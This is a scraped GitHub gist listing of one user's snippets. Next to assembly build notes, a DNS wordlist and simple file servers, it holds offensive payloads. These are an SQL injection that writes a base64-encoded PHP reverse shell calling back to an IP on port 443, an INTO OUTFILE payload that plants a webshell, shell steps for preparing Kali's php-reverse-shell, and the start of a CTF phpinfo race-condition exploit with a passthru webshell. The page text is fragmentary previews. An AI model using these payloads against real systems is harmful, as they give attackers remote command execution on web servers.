how to assemble and link:
nasm -f elf32 -o <filename>.o <filename>.asm
ld -m elf_i386 -o <filename> <filename>.otemplate code (hello world):
section .text
global _start
Diego Albuquerque diegoalbuquerque
diegoalbuquerque
/ all.txt
Created
December 20, 2020 18:10
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
diegoalbuquerque
/ compiling_asm.md
Created
October 14, 2020 20:08
— forked from yellowbyte/compiling_asm.md
how to assemble assembly with NASM assembler to 32-bit or 64-bit ELF binary with or without libc
diegoalbuquerque
/ pyshared.py
Created
August 10, 2020 11:07
A simple FTP server built on pyftpdlib for quick file sharing
diegoalbuquerque
/ resources.md
Created
August 7, 2020 10:50
— forked from muff-in/resources.md
diegoalbuquerque
/ gist:d43f583036ef8862b25064e2f05b31af
Last active
May 19, 2020 22:06
example of php base 64 on sqli
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| myusername=john&mypassword=-9334' OR 1908=1908 limit 0,0 union all select "<?php eval(base64_decode(",”'c2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokaXAgPSAnMTkyLjE2OC4yMDAuMyc7ICAvLyBDSEFOR0UgVEhJUwokcG9ydCA9IDQ0MzsgICAgICAgLy8gQ0hBTkdFIFRISVMKJGNodW5rX3NpemUgPSAxNDAwOwokd3JpdGVfYSA9IG51bGw7CiRlcnJvcl9hID0gbnVsbDsKJHNoZWxsID0gJ3VuYW1lIC1hOyB3OyBpZDsgL2Jpbi9zaCAtaSc7CiRkYWVtb24gPSAwOwokZGVidWcgPSAwOwoKCmlmIChmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgewoJJHBpZCA9IHBjbnRsX2ZvcmsoKTsKCQoJaWYgKCRwaWQgPT0gLTEpIHsKCQlwcmludGl0KCJFUlJPUjogQ2FuJ3QgZm9yayIpOwoJCWV4aXQoMSk7Cgl9CgkKCWlmICgkcGlkKSB7CgkJZXhpdCgwKTsgIC8vIFBhcmVudCBleGl0cwoJfQoKCWlmIChwb3NpeF9zZXRzaWQoKSA9PSAtMSkgewoJCXByaW50aXQoIkVycm9yOiBDYW4ndCBzZXRzaWQoKSIpOwoJCWV4aXQoMSk7Cgl9CgoJJGRhZW1vbiA9IDE7Cn0gZWxzZSB7CglwcmludGl0KCJXQVJOSU5HOiBGYWlsZWQgdG8gZGFlbW9uaXNlLiAgVGhpcyBpcyBxdWl0ZSBjb21tb24gYW5kIG5vdCBmYXRhbC4iKTsKfQoKY2hkaXIoIi8iKTsKCnVtYXNrKDApOwoKCiRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOwppZiAoISRzb2NrKSB7CglwcmludGl0 |
diegoalbuquerque
/ eval_base64decode.php
Created
May 19, 2020 21:52
Exemplo de de-conversão base64 e execução de código em php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php eval(base64_decode('<codigo em base64')); ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| myusername=john&mypassword=-9334' OR 1908=1908 LIMIT 0,1 INTO OUTFILE | |
| '/var/www/meu-lindo-shell.php' LINES TERMINATED BY | |
| 0x3c3f7068 (... todo o hexa aqui ...)-- - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@kbca# locate webshell | grep revers | |
| /usr/share/webshells/jsp/jsp-reverse.jsp | |
| /usr/share/webshells/perl/perl-reverse-shell.pl | |
| /usr/share/webshells/php/php-reverse-shell.php | |
| root@kbca# cp /usr/share/webshells/php/php-reverse-shell.php meu-lindo-shell.php | |
| # >>>> Precisamos Substituir o IP e Porta <<<< | |
| root@kbca# grep -i "CHANGE THIS" meu-lindo-shell.php | |
| $ip = '127.0.0.1'; // CHANGE THIS |
diegoalbuquerque
/ SimpleHTTPServerWithUpload.py
Created
May 12, 2020 18:44
— forked from touilleMan/SimpleHTTPServerWithUpload.py
Simple Python Http Server with Upload - Python3 version
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """Simple HTTP Server With Upload. | |
| This module builds on BaseHTTPServer by implementing the standard GET | |
| and HEAD requests in a fairly straightforward manner. | |
| see: https://gist.github.com/UniIsland/3346170 | |
| """ | |
diegoalbuquerque
/ phpinfo_exploit.py
Created
May 7, 2020 20:39
— forked from intrd/phpinfo_exploit.py
PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit | |
| # Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team | |
| # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
| ## passwords.txt payload content | |
| # <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?> | |
| import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re | |
| from subprocess import Popen, PIPE, STDOUT |